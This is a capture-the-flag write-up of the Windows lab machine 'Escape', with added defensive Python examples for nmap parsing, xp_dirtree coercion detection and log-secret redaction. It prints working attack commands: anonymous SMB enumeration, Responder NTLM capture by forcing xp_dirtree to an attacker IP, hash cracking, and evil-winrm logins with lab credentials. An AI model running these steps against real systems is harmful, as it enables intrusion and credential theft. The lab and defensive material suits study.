Escape Coursework : HTB
Escape is a medium-rated Windows box on the HTB platform, and this is how I went about solving it.
Enumeration
Using nmap we get the following information back.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-03-12 14:17:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-03-12T14:19:36+00:00; +8h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-12T14:19:35+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-03-12T14:19:36+00:00; +8h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-03-12T14:19:35+00:00; +8h00m00s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-03-12T14:18:57
|_ start_date: N/A
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
ip = 10.10.11.202 domain = sequel.htb
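The scan above carries more than a list of ports: the LDAP banner gives the AD domain, the certificate gives the DC hostname, and the clock-skew line (+8h) tells us Kerberos authentication will fail until our clock is synced, because Kerberos tolerates only a few minutes of skew by default. The following parser pulls those facts out of nmap's text output. It is an added example, not part of the original write-up; the sample input is a constructed excerpt of the scan above, and the 300-second tolerance is the common Kerberos default.

```python
import re

# Constructed excerpt modelled on the nmap -sV output above; the full scan is
# longer, but these lines carry the facts the parser looks for.
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-03-12 14:17:58Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-12T14:19:35+00:00; +8h00m00s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
"""

# One service line: "<port>/<proto> <state> <service> <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
DOMAIN_RE = re.compile(r"Domain:\s*([A-Za-z0-9.-]+),")
CN_RE = re.compile(r"Subject: commonName=([A-Za-z0-9.-]+)")
SKEW_RE = re.compile(r"clock-skew: mean:\s*(-?)(\d+)h(\d+)m(\d+)s")

# Kerberos rejects tickets whose timestamps differ by more than this (default
# KDC setting is 5 minutes); assumed value for the check below.
KERBEROS_MAX_SKEW_SECONDS = 300


def parse_nmap(text):
    """Pull open ports, AD domain, DC hostname and clock skew out of nmap -sV text."""
    result = {"ports": [], "domain": None, "dc_hostname": None, "skew_seconds": None}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            result["ports"].append((int(port), proto, state, service, version))
            d = DOMAIN_RE.search(version)
            if d and result["domain"] is None:
                # nmap prints the LDAP domain as "sequel.htb0."; drop the trailing "0."
                result["domain"] = re.sub(r"0\.$", "", d.group(1))
            continue
        c = CN_RE.search(line)
        if c and result["dc_hostname"] is None:
            result["dc_hostname"] = c.group(1)
        s = SKEW_RE.search(line)
        if s:
            sign, hours, minutes, seconds = s.groups()
            total = int(hours) * 3600 + int(minutes) * 60 + int(seconds)
            result["skew_seconds"] = -total if sign == "-" else total
    return result


def kerberos_skew_ok(skew_seconds, tolerance=KERBEROS_MAX_SKEW_SECONDS):
    """True if the measured skew is inside what the KDC will accept."""
    return abs(skew_seconds) <= tolerance


def open_ports(parsed):
    """Sorted list of port numbers nmap reported as open."""
    return sorted(p[0] for p in parsed["ports"] if p[2] == "open")


if __name__ == "__main__":
    info = parse_nmap(SAMPLE_NMAP)
    print("domain:", info["domain"], "dc:", info["dc_hostname"])
    print("open ports:", open_ports(info))
    if not kerberos_skew_ok(info["skew_seconds"]):
        print(f"clock skew {info['skew_seconds']}s exceeds Kerberos tolerance; sync the clock before using Kerberos")
```

The skew check is the practical takeaway: on this box the target is eight hours ahead, so any Kerberos-based tool will need the local clock adjusted to the DC's time first.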
We can add this domain name to the /etc/hosts file so that the IP address maps to the domain name for us, working like a local DNS entry.
Note OS: Windows 10.0
We see that the SMB port (445) is open, so we can check for server misconfigurations such as anonymous login being allowed.
➜ ~ smbclient -L //10.10.11.202
➜ ~ crackmapexec smb 10.10.11.202 -u anonymous -p anonymous --shares
➜ ~ smbclient -U anonymous //10.10.11.202/Public
The first command lists the shares, and the crackmapexec command confirms there is a share called Public that we can access:
We log in successfully and download the PDF that is there. Opening the PDF locally, we find credentials for accessing the public share: PublicUser:GuestUserCantWrite1.
We can try these credentials for password reuse against the MSSQL database on port 1433, and it works:
➜ ~ impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@sequel.htb -p 1433
Basic enumeration of the database turns up little of interest. I will try the same credentials against LDAP.
➜ ~ crackmapexec ldap sequel.htb -u "PublicUser" -p "GuestUserCantWrite1"
- this shows a successful LDAPS bind.
➜ ~ ldapdomaindump -u "sequel.htb\PublicUser" -p "GuestUserCantWrite1" ldaps://sequel.htb
- we specify that we want LDAPS
- plain LDAP fails, so we must force the bind to use TLS, right :/
Both ldapsearch and ldapdomaindump fail.
* Note that we have two ports for LDAP:
* 389/tcp open ldap → this is plain LDAP
* 636/tcp open ssl/ldap → this is LDAPS (LDAP over TLS)
The next thing we can try is LLMNR poisoning using Responder. It is actually easy: we create a fake, rogue SMB share and trick the database host into trying to authenticate to it, which lets us capture its NTLM authentication hash as it does so.
On our machine we start up responder
➜ ~ sudo responder -I tun0 -v
On the database we execute this:
➜ ~ exec master.dbo.xp_dirtree '\\10.10.16.7\SHARE'
Responder captures the hash. Save it to a file named hash and crack it with John the Ripper:
➜ ~ john --wordlist=/usr/share/wordlists/rockyou.txt hash
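What makes this step work is that xp_dirtree (and its siblings xp_fileexist and xp_subdirs) make the SQL Server service account open whatever path it is handed, so a UNC path to an attacker host produces an outbound SMB authentication from the service account. From the defender's side the signal is clear in any query audit: a low-privileged login calling one of these procedures with a UNC path to a host the server has no business talking to. The following detection runs that check over sample audit lines. It is an added example and not part of the original write-up; the "timestamp | login | statement" line shape, the audit lines and the allowlist of SMB hosts are all constructed for the example.

```python
import re

# Constructed audit lines in a "timestamp | login | statement" shape. They are
# not real SQL Server audit output, just a stand-in for what an audit pipeline
# (SQL Server Audit, Extended Events, a database proxy) would emit.
SAMPLE_AUDIT = [
    "2023-03-12T14:20:01Z | sequel\\backup_svc | BACKUP DATABASE Sales TO DISK='\\\\fileserver.sequel.htb\\backups\\sales.bak'",
    "2023-03-12T14:21:15Z | PublicUser | exec master.dbo.xp_dirtree '\\\\10.10.16.7\\SHARE'",
    "2023-03-12T14:21:40Z | PublicUser | SELECT name FROM sys.databases",
    "2023-03-12T14:22:05Z | sequel\\ryan.cooper | EXEC master..xp_fileexist '\\\\fileserver.sequel.htb\\backups\\sales.bak'",
    "2023-03-12T14:22:30Z | PublicUser | EXEC xp_subdirs N'\\\\unknown-host.example\\c$'",
]

# Extended procedures that take a path argument; a UNC path makes the SQL
# Server service account authenticate to that host over SMB.
PROC_RE = re.compile(r"\b(xp_dirtree|xp_fileexist|xp_subdirs)\b", re.IGNORECASE)
# "\\host\share..." -> capture "host"
UNC_RE = re.compile(r"\\\\([A-Za-z0-9.\-]+)\\")
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

# Hosts this SQL Server is expected to reach over SMB (constructed allowlist).
ALLOWED_UNC_HOSTS = {"fileserver.sequel.htb"}


def parse_line(line):
    """Split one constructed audit line into (timestamp, login, statement)."""
    ts, login, statement = (part.strip() for part in line.split("|", 2))
    return ts, login, statement


def check_statement(statement):
    """Return the reasons a statement is suspicious; empty list means clean."""
    reasons = []
    proc = PROC_RE.search(statement)
    if not proc:
        return reasons
    for host in UNC_RE.findall(statement):
        if host.lower() not in ALLOWED_UNC_HOSTS:
            reasons.append(f"{proc.group(1)} to non-allowlisted host {host}")
        if IPV4_RE.match(host):
            # A raw IP instead of a DNS name is typical of an attacker-controlled listener.
            reasons.append(f"{proc.group(1)} to raw IP {host}")
    return reasons


def scan(lines):
    """Run check_statement over every audit line; returns (timestamp, login, reason) tuples."""
    findings = []
    for line in lines:
        ts, login, statement = parse_line(line)
        for reason in check_statement(statement):
            findings.append((ts, login, reason))
    return findings


if __name__ == "__main__":
    for ts, login, reason in scan(SAMPLE_AUDIT):
        print(f"{ts} {login}: {reason}")
```

Detection is the second line of defence; the first is not letting the service account reach arbitrary hosts at all, which means egress filtering of TCP 445 from the database server and not granting these procedures to low-privileged logins.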
We get the credentials sql_svc:REGGIE1234ronnie. Now we can test whether these credentials let us log in to the machine over the WinRM port.
➜ ~ crackmapexec winrm sequel.htb -u sql_svc -p REGGIE1234ronnie
- we get the (Pwn3d!) message, so we can log in with the evil-winrm tool
➜ ~ evil-winrm -i sequel.htb -u sql_svc -p REGGIE1234ronnie
- we log in successfully.
User Flag
On the box, we find a non-default folder SQLServer on the C:\ drive. It contains logs, and with this command we are able to get credentials for one of the users.
➜ ~ *Evil-WinRM* PS C:\SQLServer\LOgs> Get-Content ERRORLOG.BAK | select-string pass
- Now we can log in as the user Ryan using these credentials.
sequel.htb\Ryan.Cooper : NuclearMosquito3
➜ ~ evil-winrm -i sequel.htb -u Ryan.Cooper -p NuclearMosquito3
The flag is on his desktop.
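The credential in the ERRORLOG got there the way it usually does: a user typed their password into the username field, so SQL Server dutifully logged "Login failed for user '<password>'" with a "could not find a login" reason right after a failed attempt for the real account. Grepping for "pass" finds it, but a defender wants to find and scrub such lines before anyone else does. The scanner below flags failed-login entries whose "user" is not a known or domain-qualified principal and looks password-shaped, then redacts them. It is an added example, not part of the original write-up; the log excerpt, the placeholder secret and the known-login set are constructed, and the line format follows the shape of SQL Server's failed-logon messages.

```python
import re

# Constructed ERRORLOG excerpt shaped like SQL Server's failed-logon entries.
# The user mistyped their password into the username field, so line 4 carries
# a secret in clear text. All values, including the secret, are made up.
SAMPLE_ERRORLOG = """\
2022-11-18 13:43:05.96 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:05.96 Logon       Login failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 5.
2022-11-18 13:43:07.44 Logon       Login failed for user 'Typed-Pass-Here1'. Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.5]
2022-11-18 13:45:10.10 Logon       Login failed for user 'sequel.htb\\PublicUser'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]
"""

LOGIN_FAILED_RE = re.compile(
    r"Login failed for user '(?P<user>[^']*)'\. Reason: (?P<reason>[^.]*)\."
)

# Logins known to exist on this server (constructed); compared case-insensitively.
KNOWN_LOGINS = {"sequel.htb\\ryan.cooper", "sequel.htb\\publicuser", "sa"}


def looks_like_principal(name):
    """Domain-qualified, UPN-style or known names are account names, not typos."""
    return "\\" in name or "@" in name or name.lower() in KNOWN_LOGINS


def looks_like_secret(name):
    """Password-shaped: 8+ characters mixing letters with digits or punctuation."""
    has_letter = re.search(r"[A-Za-z]", name) is not None
    has_other = re.search(r"[0-9!-/:-@\[-`{-~]", name) is not None
    return len(name) >= 8 and has_letter and has_other


def find_leaked_secrets(text):
    """Return (line_number, suspect) for failed logins whose 'user' looks like a password."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOGIN_FAILED_RE.search(line)
        if not m:
            continue
        user, reason = m.group("user"), m.group("reason")
        # "Could not find a login" means the string is not an account at all.
        if (reason.startswith("Could not find a login")
                and not looks_like_principal(user)
                and looks_like_secret(user)):
            hits.append((lineno, user))
    return hits


def redact(text):
    """Replace every flagged secret with a marker so the log can be shared safely."""
    out = text
    for _, secret in find_leaked_secrets(text):
        out = out.replace(f"'{secret}'", "'[REDACTED]'")
    return out


if __name__ == "__main__":
    for lineno, secret in find_leaked_secrets(SAMPLE_ERRORLOG):
        print(f"line {lineno}: possible password logged as login name ({len(secret)} chars)")
    print(redact(SAMPLE_ERRORLOG))
```

The heuristic deliberately keys on the "no such login" reason following a password failure for a real account, which is the signature of a username/password mix-up; a stricter version would also require the two events to come from the same client within a few seconds. The real fix is forcing a password change for the account whose secret was logged, since redaction only helps with copies that have not yet left the server.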
Root Flag
Coming soon.